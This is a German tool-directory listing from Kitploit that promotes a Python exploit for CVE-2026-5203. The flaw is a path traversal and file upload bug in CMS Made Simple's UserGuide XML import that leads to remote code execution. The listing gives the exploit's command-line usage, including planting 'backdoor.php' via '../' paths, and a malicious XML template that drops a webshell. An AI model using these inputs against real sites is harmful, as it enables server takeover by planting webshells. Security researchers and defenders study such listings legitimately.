Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-5203 — Python-Exploit für CVE-2026-5203: authentifizierter Path-Traversal und beliebiger Dateiupload in CMS Made Simple ≤ 2.22, der Remote-Code-Ausführung mittels PHP-Webshell-Bereitstellung ermöglicht. | Kitploit
Tools/GitHubGitHub/caginkyr/cve-2026-5203
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHubcaginkyr/cve-2026-5203

CVE-2026-5203

Python-Exploit für CVE-2026-5203: authentifizierter Path-Traversal und beliebiger Dateiupload in CMS Made Simple ≤ 2.22, der Remote-Code-Ausführung mittels PHP-Webshell-Bereitstellung ermöglicht.

Repository anzeigen
vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-5203 — CMS Made Simple ≤ 2.2.22 RCE (Pfad-Traversal + Beliebiger Datei-Upload)

CVSS Version Type

Zusammenfassung

Die XML-Import-Funktionalität des UserGuide-Moduls in CMS Made Simple ≤ 2.2.22 bereinigt vom Benutzer bereitgestellte Dateinamen nicht, sodass ein authentifizierter Administrator über Pfad-Traversal-Sequenzen beliebige Dateien (z. B. PHP-Webshells) an beliebiger Stelle im Dateisystem des Servers hochladen kann.

FeldWert
TypPfad-Traversal / Beliebiger Datei-Upload → RCE
KomponenteUserGuide-Modul — XML-Import
Betroffene Dateimodules/UserGuide/lib/class.UserGuideImporterExporter.php
CVSS v3.17.2 HOCH — CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
Authentifizierung erforderlichJa (Administrator)

Angreifbarer Code

root@kitploit:~
// modules/UserGuide/lib/class.UserGuideImporterExporter.php (~L250-280)
$filename = (string) $xmlFile->filename;
$isdir    = (string) $xmlFile->isdir;   

Die Funktion schreibt Base64-dekodierten Inhalt direkt in den vom Angreifer kontrollierten Pfad.


Verwendung

root@kitploit:~
python exploit.py <base_url> <admin_url> <username> <password> [upload_path]

Beispiele:

root@kitploit:~
# Standardpfad
python exploit.py http://target.com http://target.com/admin admin password123

# Benutzerdefinierter Upload-Pfad
python exploit.py http://target.com http://target.com/admin admin password123 \
  ../../../../../../var/www/html/backdoor.php

Interactive Shell startet automatisch, wenn die Web-Shell nach dem Hochladen erreichbar ist.


Bösartige XML-Struktur

root@kitploit:~
<?xml version="1.0" encoding="UTF-8"?>
<modulecontent>
  <module>UserGuide</module>
  <version>1.3</version>
  <files>
    <file>
      <filename>../../../webshell.php</filename>
      <isdir>0</isdir>
      <data>[BASE64_ENCODED_PHP_CODE]</data>
    </file>
  </files>
</modulecontent>

Tool herunterladen